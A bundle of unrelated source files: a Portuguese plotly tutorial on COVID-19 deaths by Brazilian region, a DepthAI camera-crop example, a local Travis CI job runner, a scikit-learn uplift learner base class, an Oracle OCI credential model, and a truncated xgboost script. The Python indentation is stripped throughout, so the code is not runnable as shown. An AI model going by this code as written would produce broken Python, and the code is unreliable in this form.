fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Centro-Oeste'], mode='lines', name='Centro-Oeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Sul'], mode='lines', name='Sul'))
fig.update_layout( title='Óbitos de COVID-19 nas regiões do Brasil',
xaxis_title='Data', yaxis_title='Total de Óbitos', legend_title_text='Região', hovermode='x unified')
## Gráficos de coluna
fig = px.bar(covid_Regioes.reset_index().rename({'regiao':'Região','obitosNovos':'Total de Óbitos'}, axis=1),
x='Região', y='Total de Óbitos',
title='Óbitos por COVID-19 nas Regiões do Brasil')
fig.show()
Neste caso é bem simples fazer este gráfico com **graph_objects**:
covid_coluna = covid_Regioes.reset_index().rename({'regiao':'Região','obitosNovos':'Total de Óbitos'}, axis=1)
fig = go.Figure([go.Bar(x=covid_coluna['Região'], y=covid_coluna['Total de Óbitos'])])
fig.update_layout( title='Óbitos de COVID-19 nas regiões do Brasil',
xaxis_title='Região', yaxis_title='Total de Óbitos')
fig.show()
covid_coluna = covid_Regioes.reset_index().rename({'regiao':'Região','obitosNovos':'Total de Óbitos'}, axis=1)
covid_coluna['Até 18/07/2020'] = '' #Criamos uma coluna igual para todos para servir de coordenada x
fig = px.bar(covid_coluna,
x='Até 18/07/2020', y='Total de Óbitos', color='Região',
title='Óbitos por COVID-19 nas Regiões do Brasil',
barmode='group') #Esse argumento coloca as colunas lado a lado
fig.show()
Vamos recriar o gráfico anterior com **graph_objects**, neste caso sem colocar nenhuma informação no eixo *x*.
fig = go.Figure(data=[
go.Bar(name='Norte', x=['Óbitos'], y=covid_Regioes.loc['Norte']),
go.Bar(name='Nordeste', x=['Óbitos'], y=covid_Regioes.loc['Nordeste']),
go.Bar(name='Centro-Oeste', x=['Óbitos'], y=covid_Regioes.loc['Centro-Oeste']),
go.Bar(name='Sudeste', x=['Óbitos'], y=covid_Regioes.loc['Sudeste']),
go.Bar(name='Sul', x=['Óbitos'], y=covid_Regioes.loc['Sul'])
])
fig.update_layout(barmode='group', title='Óbitos por COVID-19 nas Regiões do Brasil',
yaxis_title='Total de Óbitos', legend_title_text='Região')
fig.update_xaxes(showticklabels=False)
fig.show()
fig = px.bar(covid_coluna, x='Até 18/07/2020', y='Total de Óbitos', color='Região',
title='Óbitos por COVID-19 nas Regiões do Brasil')
#Sem o argumento barmode='group' ficamos com as colunas empilhadas
fig.show()
fig = go.Figure(data=[
go.Bar(name='Norte', x=['Óbitos'], y=covid_Regioes.loc['Norte']),
go.Bar(name='Nordeste', x=['Óbitos'], y=covid_Regioes.loc['Nordeste']),
go.Bar(name='Centro-Oeste', x=['Óbitos'], y=covid_Regioes.loc['Centro-Oeste']),
go.Bar(name='Sudeste', x=['Óbitos'], y=covid_Regioes.loc['Sudeste']),
go.Bar(name='Sul', x=['Óbitos'], y=covid_Regioes.loc['Sul'])
])
fig.update_layout(barmode='stack', title='Óbitos por COVID-19 nas Regiões do Brasil',
yaxis_title='Total de Óbitos', legend_title_text='Região')
fig.update_xaxes(showticklabels=False)
fig.show()
## Gráfico de Setores
O método *pie* das bibliotecas **plotly.express** e **plotly.graph_objects** são bastante imediatos e se assemelham muito ao que vimos anteriormente para o **matplotlib**.
fig = px.pie(covid_Regioes_pct, values='obitosNovos', names=covid_Regioes_pct.index,
title = 'Distribuição dos Óbitos por COVID-19 nas Regiões do Brasil até 18/07/2020')
fig.show()
fig = go.Figure(data=[go.Pie(labels=covid_Regioes_pct.index, values=covid_Regioes_pct.obitosNovos,
pull=covid_Regioes_pct.explodir)])
fig.update_layout(title='Distribuição dos Óbitos por COVID-19 nas Regiões do Brasil até 18/07/2020',
yaxis_title='Total de Óbitos', legend_title_text='Região')
fig.show()
## Gráfico de Dispersão
Na prática os gráficos de linha e de dispersão são realizados com o mesmo método no **plotly.graph_objects**. Já no **plotly.express** é análogo ao método que vimos para o **matplotlib**.
df_exemplo_px = pd.DataFrame(df_exemplo['coluna_1']).rename({'coluna_1':'Valor'}, axis=1)
df_exemplo_px['Coluna'] = 'Coluna 1'
df_exemplo_px_temp = pd.DataFrame(df_exemplo['coluna_2']).rename({'coluna_2':'Valor'}, axis=1)
df_exemplo_px_temp['Coluna'] = 'Coluna 2'
df_exemplo_px = pd.concat([df_exemplo_px, df_exemplo_px_temp])
df_exemplo_px_temp = pd.DataFrame(df_exemplo['coluna_3']).rename({'coluna_3':'Valor'}, axis=1)
df_exemplo_px_temp['Coluna'] = 'Coluna 3'
df_exemplo_px = pd.concat([df_exemplo_px, df_exemplo_px_temp])
df_exemplo_px.head()
fig = px.scatter(df_exemplo_px, x=df_exemplo_px.index, y='Valor', color='Coluna')
fig.show()
Utilizando o pacote podemos trabalhar diretamente com o *df_exemplo*:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df_exemplo.index, y=df_exemplo['coluna_1'], mode='markers', name='Coluna 1'))
fig.add_trace(go.Scatter(x=df_exemplo.index, y=df_exemplo['coluna_2'], mode='markers',name='Coluna 2'))
fig.add_trace(go.Scatter(x=df_exemplo.index, y=df_exemplo['coluna_3'], mode='markers',name='Coluna 3'))
fig.update_layout( title='Gráfico de Dispersão do df_exemplo',
xaxis_title='Data', yaxis_title='Valor', legend_title_text='Coluna')
## Histograma
Com o **plotly.express** podemos aplicar o método diretamente com poucas diferenças entre os argumentos. Vemos que no lugar de *bins*, devemos utilizar *nbins* e no lugar de *alpha*, devemos combinar *barmode='overlay'* com *opacity*.
Vamos preparar o banco de dados para o histograma.
covid_regioes_diarios = pd.DataFrame()
regioes = covid_BR.query('regiao != "Brasil"')['regiao'].drop_duplicates().array
for regiao in regioes:
temp_series = covid_BR.set_index('data').query('regiao == @regiao')['obitosNovos'].groupby('data').sum()/2
temp_series.name = 'obitos_' + regiao
covid_regioes_diarios = pd.concat([covid_regioes_diarios, temp_series], axis=1)
covid_regioes_diarios.index = pd.to_datetime(covid_regioes_diarios.index)
covid_regioes_diarios
fig = px.histogram(covid_regioes_diarios.obitos_Nordeste, nbins=30, title='''
Distribuição da quantidade de óbitos diários de COVID-19 no nordeste do Brasil
''')
fig.show()
covid_regioes_diarios_px = covid_BR.set_index(
'data').query('regiao != "Brasil"')[['obitosNovos', 'regiao']].reset_index().rename(
{'obitosNovos':'Óbitos','regiao':'Região','data':'Data'},axis=1)
covid_regioes_diarios_px = covid_regioes_diarios_px.groupby(['Região','Data']).sum()/2
covid_regioes_diarios_px = covid_regioes_diarios_px.reset_index().set_index('Data')
fig = px.histogram(covid_regioes_diarios_px, nbins=30, color='Região', opacity=0.5, barmode='overlay', title='''
Distribuição da quantidade de óbitos diários de COVID-19 nas regiões do Brasil
''')
fig.show()
Agora vejamos com **plotly.graph_objects**:
def fazer_histograma_plotly():
fig = go.Figure()
fig.update_layout(barmode='overlay', title='''
Distribuição da quantidade de óbitos diários de COVID-19 nas regiões do Brasil
''',
yaxis_title="Quantidade de Dias", xaxis_title="Óbitos",legend_title_text='Região')
fig.add_trace(go.Histogram(x=covid_regioes_diarios['obitos_Norte'], name='Norte'))
fig.add_trace(go.Histogram(x=covid_regioes_diarios['obitos_Nordeste'], name='Nordeste'))
fig.add_trace(go.Histogram(x=covid_regioes_diarios['obitos_Centro-Oeste'], name='Centro-Oeste'))
fig.add_trace(go.Histogram(x=covid_regioes_diarios['obitos_Sudeste'], name='Sudeste'))
fig.add_trace(go.Histogram(x=covid_regioes_diarios['obitos_Sul'], name='Sul'))
fig.update_traces(opacity=0.5, xbins={'size':50})
fig.show()
fazer_histograma_plotly()
## BoxPlot
No **plotly** os argumentos do *boxplot* são muito semelhantes aos do histograma, mudando essencialmente que o argumento dos dados no histograma é *x* e do *boxplot* é *y*.
fig = px.box(df_exemplo_px, x="Coluna", y="Valor")
fig.show()
fig = px.box(covid_regioes_diarios_px, x="Região", y="Óbitos")
fig.show()
fig = px.box(covid_regioes_diarios_px, x='Região', y='Óbitos', notched=True, color='Região',
title='Distribuição da quantidade de óbitos diários de COVID-19 nas regiões do Brasil')
fig.show()
def fazer_boxplot_plotly():
fig = go.Figure()
fig.update_layout(barmode='overlay', title='''
Distribuição da quantidade de óbitos diários de COVID-19 nas regiões do Brasil
''',
yaxis_title="Óbitos", legend_title_text='Região')
fig.add_trace(go.Box(y=covid_regioes_diarios['obitos_Norte'], name='Norte'))
fig.add_trace(go.Box(y=covid_regioes_diarios['obitos_Nordeste'], name='Nordeste'))
fig.add_trace(go.Box(y=covid_regioes_diarios['obitos_Centro-Oeste'], name='Centro-Oeste'))
fig.add_trace(go.Box(y=covid_regioes_diarios['obitos_Sudeste'], name='Sudeste'))
fig.add_trace(go.Box(y=covid_regioes_diarios['obitos_Sul'], name='Sul'))
fig.show()
fazer_boxplot_plotly() |
#!/usr/bin/env python3
"""
This example shows usage of mono camera in crop mode with the possibility to move the crop.
Uses 'WASD' controls to move the crop window, 'T' to trigger autofocus, 'IOKL,.' for manual exposure/focus:
Control: key[dec/inc] min..max
exposure time: I O 1..33000 [us]
sensitivity iso: K L 100..1600
To go back to auto controls:
'E' - autoexposure
"""
import cv2
import depthai as dai
# Step size ('W','A','S','D' controls)
stepSize = 0.02
# Manual exposure/focus set step
expStep = 500 # us
isoStep = 50
# Start defining a pipeline
pipeline = dai.Pipeline()
# Define a source - two mono (grayscale) camera
camRight = pipeline.createMonoCamera()
camRight.setBoardSocket(dai.CameraBoardSocket.RIGHT)
camRight.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
camLeft = pipeline.createMonoCamera()
camLeft.setBoardSocket(dai.CameraBoardSocket.LEFT)
camLeft.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
# Crop range
topLeft = dai.Point2f(0.4, 0.4)
bottomRight = dai.Point2f(0.6, 0.6)
manipRight = pipeline.createImageManip()
manipRight.initialConfig.setCropRect(topLeft.x, topLeft.y, bottomRight.x, bottomRight.y)
manipLeft = pipeline.createImageManip()
manipLeft.initialConfig.setCropRect(topLeft.x, topLeft.y, bottomRight.x, bottomRight.y)
manipRight.setMaxOutputFrameSize(camRight.getResolutionHeight()*camRight.getResolutionWidth()*3)
# Camera movement config (wasd)
configIn = pipeline.createXLinkIn()
configIn.setStreamName('config')
configIn.out.link(manipRight.inputConfig)
configIn.out.link(manipLeft.inputConfig)
# Camera control (exp, iso, focus)
controlIn = pipeline.createXLinkIn()
controlIn.setStreamName('control')
controlIn.out.link(camRight.inputControl)
controlIn.out.link(camLeft.inputControl)
# Linking with USB
camRight.out.link(manipRight.inputImage)
camLeft.out.link(manipLeft.inputImage)
# Create outputs
manipOutRight = pipeline.createXLinkOut()
manipOutRight.setStreamName("right")
manipRight.out.link(manipOutRight.input)
manipOutLeft = pipeline.createXLinkOut()
manipOutLeft.setStreamName("left")
manipLeft.out.link(manipOutLeft.input)
def clamp(num, v0, v1):
return max(v0, min(num, v1))
# Pipeline defined, now the device is connected to
with dai.Device(pipeline) as device:
# Start pipeline
device.startPipeline()
# Output queues will be used to get the grayscale frames
qRight = device.getOutputQueue(manipOutRight.getStreamName(), maxSize=4, blocking=False)
qLeft = device.getOutputQueue(manipOutLeft.getStreamName(), maxSize=4, blocking=False)
configQueue = device.getInputQueue(configIn.getStreamName())
controlQueue = device.getInputQueue(controlIn.getStreamName())
def displayFrame(name, frame):
cv2.imshow(name, frame)
sendCamConfig = False
# Defaults and limits for manual focus/exposure controls
expTime = 20000
expMin = 1
expMax = 33000
sensIso = 800
sensMin = 100
sensMax = 1600
while True:
inRight = qRight.get()
inLeft = qLeft.get()
frameRight = inRight.getCvFrame()
frameLeft = inLeft.getCvFrame()
displayFrame("right", frameRight)
displayFrame("left", frameLeft)
# Update screen
key = cv2.waitKey(1)
if key == ord('q'):
break
elif key == ord('c'):
ctrl = dai.CameraControl()
ctrl.setCaptureStill(True)
controlQueue.send(ctrl)
elif key == ord('e'):
print("Autoexposure enable")
ctrl = dai.CameraControl()
ctrl.setAutoExposureEnable()
controlQueue.send(ctrl)
elif key in [ord('i'), ord('o'), ord('k'), ord('l')]:
if key == ord('i'): expTime -= expStep
if key == ord('o'): expTime += expStep
if key == ord('k'): sensIso -= isoStep
if key == ord('l'): sensIso += isoStep
expTime = clamp(expTime, expMin, expMax)
sensIso = clamp(sensIso, sensMin, sensMax)
print("Setting manual exposure, time:", expTime, "iso:", sensIso)
ctrl = dai.CameraControl()
ctrl.setManualExposure(expTime, sensIso)
controlQueue.send(ctrl)
elif key == ord('w'):
if topLeft.y - stepSize >= 0:
topLeft.y -= stepSize
bottomRight.y -= stepSize
sendCamConfig = True
elif key == ord('a'):
if topLeft.x - stepSize >= 0:
topLeft.x -= stepSize
bottomRight.x -= stepSize
sendCamConfig = True
elif key == ord('s'):
if bottomRight.y + stepSize <= 1:
topLeft.y += stepSize
bottomRight.y += stepSize
sendCamConfig = True
elif key == ord('d'):
if bottomRight.x + stepSize <= 1:
topLeft.x += stepSize
bottomRight.x += stepSize
sendCamConfig = True
if sendCamConfig:
cfg = dai.ImageManipConfig()
cfg.setCropRect(topLeft.x, topLeft.y, bottomRight.x, bottomRight.y)
configQueue.send(cfg)
sendCamConfig = False
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017, <NAME>
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import difflib
import os
import os.path
import re
import subprocess
import sys
import yaml
# find config file either in first argument or curret working directory
def find_config_file(args, names):
def test_file(dir): # test if one of the file names is present
for n in names:
p = os.path.join(dir, n)
if os.path.isfile(p):
return os.path.abspath(p)
return None
if len(args) > 0: # test first argument if available
arg0=args[0]
if os.path.isfile(arg0):
return os.path.abspath(arg0),args[1:]
p = test_file(arg0)
if p is not None:
return p, args[1:]
return test_file(os.getcwd()), args
# parse range tuples from arguments
def parse_ranges(args, offset=0):
r = []
def apply_offset(i): # adjust for user offsets
ao = int(i) + offset
if ao < 0:
raise ValueError("%s is not in supported range" % str(i))
return ao
for a in args:
if '-' in a: # range string
p1, p2 = a.split('-', 2)
if p1 == '' and len(r) == 0: # -X
p1 = 0
else: # X-[Y]
p1 = apply_offset(p1)
if p2 == '': # [X]-
r.append((p1, -1))
break
r.append((p1, apply_offset(p2)+1)) # X-Y
else:
i = apply_offset(a)
r.append((i, i+1))
return r
def apply_ranges(ranges, num):
for start,end in ranges:
if end == -1:
end = num
for i in range(start,end):
yield i
def read_yaml(p):
with open(p) as f:
return yaml.safe_load(f)
# read global and job-specific envs from
def read_env(env):
m = env
g = ''
if isinstance(env, dict):
m = env['matrix']
if 'global' in env:
g = ' '.join(env['global'])
return g, m
def read_allow_failures(config):
try:
af = config['matrix']['allow_failures']
except:
return list()
return list(x['env'] for x in af)
def read_num_include(config):
try:
return len(config['matrix']['include'])
except:
return 0
def parse_extra_args(args):
try:
extra = args.index('--')
return args[0:extra], args[extra+1:]
except ValueError:
return args, []
env_assigment = re.compile(r"[a-zA-Z_][a-zA-Z0-9_]*=")
def gen_env(e):
if env_assigment.match(e):
return e
return '%s=%s' % (e, os.getenv(e, ''))
# from https://github.com/travis-ci/travis-build/blob/73bf69a439bb546520a5e5b6b6847fb5424a7c9f/lib/travis/build/env/var.rb#L5
travis_env = re.compile(r"([\w]+)=((?:[^\"'`\ ]?(\"|'|`).*?((?<!\\)\3))+|(?:[^\$]?\$\(.*?\))+|[^\"'\ ]+|(?=\s)|\Z)")
def filter_env(e):
return ' '.join(map(lambda m: m.group(0), travis_env.finditer(e)))
def highlight_diff(e, n=''):
f = filter_env(e)
def mark(d):
tag, chunk = d[0:2], d[2:]
return chunk if tag == " " or not chunk.strip(' ') else "\033[1;41m%s\033[1;%sm" % (chunk, str(n))
return ''.join(mark(d) for d in difflib.ndiff(e, f, None, None))
def print_help(cmd):
print("""
Usage: %s [PATH] [RANGE*] [-- [ENV[=VALUE]*]]
Parses the travis config in the given path or in the current working directory and runs all specified tests sequentially
If no range is given, the list of jobs will get printed.
The number of tests can be reduced by specifying one or more ranges:
* single job: 1 (only first)
* range: 2-3 (only second and third)
* open start, only as first range: -4 (jobs 1 to 4)
* open end, only as last range: 7- (job 7 and all following jobs)
* open range: - (all jobs)
Complex examples for a matrix wih 12 jobs:
* -4 7 8: runs jobs 1 2 3 4 7 8
* 1 7-9: runs jobs 1 7 8 9
* 1 7-9 11-: runs jobs 1 7 8 9 11 12
* -: runs all jobs
The jobs will be run in clean environments.
Only DOCKER_PORT, SSH_AUTH_SOCK, and TERM will be kept.
Additional variable names can be passed at the end.
""" % cmd)
def main(scripts_dir, argv):
if '--help' in argv:
print_help(argv[0])
sys.exit(0)
args, extra_env = parse_extra_args(argv[1:])
path, args = find_config_file(args, ['.travis.yml', '.travis.yaml'])
config = read_yaml(path)
global_env, job_envs = read_env(config['env'])
allow_failures = read_allow_failures(config)
job_envs = [ x for x in job_envs if x not in allow_failures ] \
+ [None] * read_num_include(config) \
+ [ x for x in job_envs if x in allow_failures ]
if len(args) == 0:
if(len(global_env) > 0):
print('Globals: %s' % str(highlight_diff(global_env)))
jobs = len(job_envs)
digits = len(str(jobs))
for i in range(jobs):
print('Job %s%s: %s' % ( str(i+1).rjust(digits),
' (allow_failures)' if job_envs[i] in allow_failures else '',
highlight_diff(job_envs[i]) if job_envs[i] is not None else "<unsupported job from 'include' section>"))
print("run all with %s -" % sys.argv[0])
sys.exit(0)
ranges = parse_ranges(args, -1)
run_ci = [os.path.join(scripts_dir, "run_ci"), os.path.dirname(path), filter_env(global_env)]
run_ci_diff = [os.path.join(scripts_dir, "run_ci"), os.path.dirname(path), highlight_diff(global_env, 44)]
bash = ['env', '-i'] +list(map(gen_env, ['DOCKER_PORT', 'HOME', 'PATH', 'SSH_AUTH_SOCK', 'TERM'])) + ['bash','-e']
selection = set(apply_ranges(ranges, len(job_envs)))
for i in selection:
if job_envs[i] is None:
print("\033[1;43mSkipped job %d, because jobs from 'include' section are not supported\033[1;m" %(i+1,))
continue
cmd = ' '.join(run_ci + [filter_env(job_envs[i])] + list(map(gen_env, extra_env)))
cmd_diff = ' '.join(run_ci_diff + [highlight_diff(job_envs[i], 44)] + list(map(gen_env, extra_env)))
print('\033[1;44mRunning job %d%s: %s\033[1;m' %(i+1, ' (allow_failures)' if job_envs[i] in allow_failures else '', cmd_diff))
proc = subprocess.Popen(bash, stdin=subprocess.PIPE)
proc.communicate(cmd.encode())
if proc.returncode:
print('\033[1;41mFailed job %d: %s\033[1;m' %(i+1, cmd))
if job_envs[i] not in allow_failures:
sys.exit(proc.returncode)
|
from abc import ABCMeta, abstractmethod
import numpy as np
from sklearn.base import (MetaEstimatorMixin,
is_classifier,
clone,)
from sklearn.utils import check_scalar
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.utils.validation import check_is_fitted
from ..base import BaseEstimator
class BaseLearner(BaseEstimator,
MetaEstimatorMixin,
metaclass=ABCMeta):
def __init__(self,
estimator,
*,
estimators_params: list,
propencity: bool = False,
propencity_score=None,
propencity_estimator=None,
random_state: int = None):
self.estimator = estimator
self.estimators_params = estimators_params
self.propencity = propencity
self.propencity_score = propencity_score
self.propencity_estimator = propencity_estimator
self.random_state = random_state
def _make_estimators(self):
if self.estimator is not None:
for e in self.estimators_params:
setattr(self, e, clone(self.estimator))
if len(self.estimators_params) != 0:
self.estimator = None
else:
self.estimators_params = ('estimator',)
@abstractmethod
def _check_params(self):
params = dict()
for e in self.estimators_params:
if getattr(self, e) is None:
raise ValueError(f'Estimator {e} is None')
if is_classifier(self) != is_classifier(getattr(self, e)):
raise ValueError(f'Estimator {e} must be '
+ ('classifier' if is_classifier(self) else 'regressor'))
if self.propencity:
if self.propencity_score is None:
if self.propencity_estimator is None:
raise ValueError('Estimator for propencity is None')
if not is_classifier(self.propencity_estimator):
raise ValueError('Estimator for propencity must be classifier')
else:
if not isinstance(self.propencity_score, list):
self.propencity_score = [self.propencity_score]
if len(self.propencity_score) != self.n_groups:
raise ValueError('Propencity vector must have same lenght as groups')
for score in self.propencity_score:
check_scalar(score,
'propencity_score', float,
min_val=0, max_val=1,
include_boundaries='neither')
return params
def fit(self, X, y, w, **fit_params):
X, y, w = self._validate_data(X, y, w,
reset=True,
force_all_finite=self._get_tags()['allow_nan'])
self._make_estimators()
params = self._check_params()
params['fit_params'] = fit_params
self.estimators = [tuple() for i in range(self.n_groups)]
if self.propencity_estimator is not None:
self.p_estimators = [tuple() for i in range(self.n_groups)]
for group in self.groups:
Xg = X[(w == group) | (w == 0)]
yg = y[(w == group) | (w == 0)]
wg = w[(w == group) | (w == 0)]
wg[wg == group] = 1
if self.propencity_estimator is not None:
self._fit_propencity(group, Xg, wg,
**fit_params.get('propencity_estimator', {}))
self._fit_group(group,
Xg, yg, wg,
**params)
return self
@abstractmethod
def _fit_group(self, group, X, y, w, **kwargs):
pass
def _fit_propencity(self, group, X, w, **fit_params):
(X, X_calib,
w, w_calib,) = train_test_split(X, w,
test_size=0.5,
stratify=w,
random_state=self.random_state)
estimator = clone(self.propencity_estimator)
estimator.fit(X, w, **fit_params)
estimator_calib = LogisticRegression(random_state=self.random_state)
estimator_calib.fit(estimator.predict_proba(X_calib)[:, 1].reshape(-1, 1),
w_calib)
self.p_estimators[group - 1] = (estimator, estimator_calib)
def predict(self, X, **kwargs):
check_is_fitted(self)
self._validate_data(X, reset=False,
force_all_finite=self._get_tags()['allow_nan'])
n_samples, _ = X.shape
preds = np.full((n_samples, self.n_groups), np.nan)
for group in self.groups:
preds[:, group - 1] = self._predict_group(group, X, **kwargs)
if self.n_groups == 1:
return preds.reshape(-1)
return preds
@abstractmethod
def _predict_group(self, group, X, **kwargs):
pass
def _predict_propencity(self, group, X, **kwargs):
if self.propencity:
if self.propencity_score is None:
estimator, estimator_calib = self.p_estimators[group - 1]
pred = estimator.predict_proba(X)[:, 1].reshape(-1, 1)
return estimator_calib.predict_proba(pred)[:, 1]
else:
return np.full(X.shape[0], self.propencity_score[group - 1])
else:
raise ValueError('Propencity is not supported')
|
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CredentialAuthenticatorInfo(object):
"""
CredentialAuthenticatorInfo model.
"""
def __init__(self, **kwargs):
"""
Initializes a new CredentialAuthenticatorInfo object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param raw_credential:
The value to assign to the raw_credential property of this CredentialAuthenticatorInfo.
:type raw_credential: str
:param user_id:
The value to assign to the user_id property of this CredentialAuthenticatorInfo.
:type user_id: str
:param tenant_id:
The value to assign to the tenant_id property of this CredentialAuthenticatorInfo.
:type tenant_id: str
:param user_name:
The value to assign to the user_name property of this CredentialAuthenticatorInfo.
:type user_name: str
:param tenant_name:
The value to assign to the tenant_name property of this CredentialAuthenticatorInfo.
:type tenant_name: str
:param credential_identifier:
The value to assign to the credential_identifier property of this CredentialAuthenticatorInfo.
:type credential_identifier: str
:param credential_list:
The value to assign to the credential_list property of this CredentialAuthenticatorInfo.
:type credential_list: list[str]
:param service:
The value to assign to the service property of this CredentialAuthenticatorInfo.
:type service: str
:param client_id:
The value to assign to the client_id property of this CredentialAuthenticatorInfo.
:type client_id: str
"""
self.swagger_types = {
'raw_credential': 'str',
'user_id': 'str',
'tenant_id': 'str',
'user_name': 'str',
'tenant_name': 'str',
'credential_identifier': 'str',
'credential_list': 'list[str]',
'service': 'str',
'client_id': 'str'
}
self.attribute_map = {
'raw_credential': 'rawCredential',
'user_id': 'userId',
'tenant_id': 'tenantId',
'user_name': 'userName',
'tenant_name': 'tenantName',
'credential_identifier': 'credentialIdentifier',
'credential_list': 'credentialList',
'service': 'service',
'client_id': 'clientId'
}
self._raw_credential = None
self._user_id = None
self._tenant_id = None
self._user_name = None
self._tenant_name = None
self._credential_identifier = None
self._credential_list = None
self._service = None
self._client_id = None
@property
def raw_credential(self):
"""
**[Required]** Gets the raw_credential of this CredentialAuthenticatorInfo.
The raw credential.
:return: The raw_credential of this CredentialAuthenticatorInfo.
:rtype: str
"""
return self._raw_credential
@raw_credential.setter
def raw_credential(self, raw_credential):
"""
Sets the raw_credential of this CredentialAuthenticatorInfo.
The raw credential.
:param raw_credential: The raw_credential of this CredentialAuthenticatorInfo.
:type: str
"""
self._raw_credential = raw_credential
@property
def user_id(self):
"""
**[Required]** Gets the user_id of this CredentialAuthenticatorInfo.
The id of the user.
:return: The user_id of this CredentialAuthenticatorInfo.
:rtype: str
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""
Sets the user_id of this CredentialAuthenticatorInfo.
The id of the user.
:param user_id: The user_id of this CredentialAuthenticatorInfo.
:type: str
"""
self._user_id = user_id
@property
def tenant_id(self):
"""
**[Required]** Gets the tenant_id of this CredentialAuthenticatorInfo.
The id of the tenant.
:return: The tenant_id of this CredentialAuthenticatorInfo.
:rtype: str
"""
return self._tenant_id
@tenant_id.setter
def tenant_id(self, tenant_id):
"""
Sets the tenant_id of this CredentialAuthenticatorInfo.
The id of the tenant.
:param tenant_id: The tenant_id of this CredentialAuthenticatorInfo.
:type: str
"""
self._tenant_id = tenant_id
@property
def user_name(self):
"""
**[Required]** Gets the user_name of this CredentialAuthenticatorInfo.
The name of the user.
:return: The user_name of this CredentialAuthenticatorInfo.
:rtype: str
"""
return self._user_name
@user_name.setter
def user_name(self, user_name):
"""
Sets the user_name of this CredentialAuthenticatorInfo.
The name of the user.
:param user_name: The user_name of this CredentialAuthenticatorInfo.
:type: str
"""
self._user_name = user_name
@property
def tenant_name(self):
"""
**[Required]** Gets the tenant_name of this CredentialAuthenticatorInfo.
The name of the tenant.
:return: The tenant_name of this CredentialAuthenticatorInfo.
:rtype: str
"""
return self._tenant_name
@tenant_name.setter
def tenant_name(self, tenant_name):
"""
Sets the tenant_name of this CredentialAuthenticatorInfo.
The name of the tenant.
:param tenant_name: The tenant_name of this CredentialAuthenticatorInfo.
:type: str
"""
self._tenant_name = tenant_name
@property
def credential_identifier(self):
"""
**[Required]** Gets the credential_identifier of this CredentialAuthenticatorInfo.
The credential identifier.
:return: The credential_identifier of this CredentialAuthenticatorInfo.
:rtype: str
"""
return self._credential_identifier
@credential_identifier.setter
def credential_identifier(self, credential_identifier):
"""
Sets the credential_identifier of this CredentialAuthenticatorInfo.
The credential identifier.
:param credential_identifier: The credential_identifier of this CredentialAuthenticatorInfo.
:type: str
"""
self._credential_identifier = credential_identifier
@property
def credential_list(self):
"""
**[Required]** Gets the credential_list of this CredentialAuthenticatorInfo.
The credential list.
:return: The credential_list of this CredentialAuthenticatorInfo.
:rtype: list[str]
"""
return self._credential_list
@credential_list.setter
def credential_list(self, credential_list):
"""
Sets the credential_list of this CredentialAuthenticatorInfo.
The credential list.
:param credential_list: The credential_list of this CredentialAuthenticatorInfo.
:type: list[str]
"""
self._credential_list = credential_list
@property
def service(self):
"""
**[Required]** Gets the service of this CredentialAuthenticatorInfo.
The name of the service that is making this authorization request.
:return: The service of this CredentialAuthenticatorInfo.
:rtype: str
"""
return self._service
@service.setter
def service(self, service):
"""
Sets the service of this CredentialAuthenticatorInfo.
The name of the service that is making this authorization request.
:param service: The service of this CredentialAuthenticatorInfo.
:type: str
"""
self._service = service
@property
def client_id(self):
"""
**[Required]** Gets the client_id of this CredentialAuthenticatorInfo.
The id of the client.
:return: The client_id of this CredentialAuthenticatorInfo.
:rtype: str
"""
return self._client_id
@client_id.setter
def client_id(self, client_id):
"""
Sets the client_id of this CredentialAuthenticatorInfo.
The id of the client.
:param client_id: The client_id of this CredentialAuthenticatorInfo.
:type: str
"""
self._client_id = client_id
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 00:20:32 2015
@author: konrad
"""
import numpy as np
import pandas as pd
import datetime
import xgboost as xgb
if __name__ == '__main__':
## settings
projPath = './'
dataset_version = "kb8"
model_type = "xgb"
seed_value = 260
todate = datetime.datetime.now().strftime("%Y%m%d")
## data
# read the training and test sets
xtrain = pd.read_csv(projPath + 'input/xtrain_'+ dataset_version + '.csv')
id_train = xtrain.QuoteNumber
ytrain = xtrain.QuoteConversion_Flag
xtrain.drop('QuoteNumber', axis = 1, inplace = True)
xtrain.drop('QuoteConversion_Flag', axis = 1, inplace = True)
xtest = pd.read_csv(projPath + 'input/xtest_'+ dataset_version + '.csv')
id_test = xtest.QuoteNumber
xtest.drop('QuoteNumber', axis = 1, inplace = True)
# folds
xfolds = pd.read_csv(projPath + 'input/xfolds.csv')
# work with 5-fold split
fold_index = xfolds.fold5
fold_index = np.array(fold_index) - 1
n_folds = len(np.unique(fold_index))
## model
# parameter grids: LR + range of training subjects to subset to
'''
Staying with index convention.
child_weight = 0
max_depth = 1
colsample = 2
rowsample = 3
gamma_val = 4
eta_val = 5
ntrees = 6
'''
param_grid = [
(1, 6, 0.73, 0.756, 0.00001, 0.017, 2400),
(1, 8, 0.789, 0.97, 0, 0.018, 1100),
(1, 7, 0.85, 0.85, 0.00008, 0.023, 488),
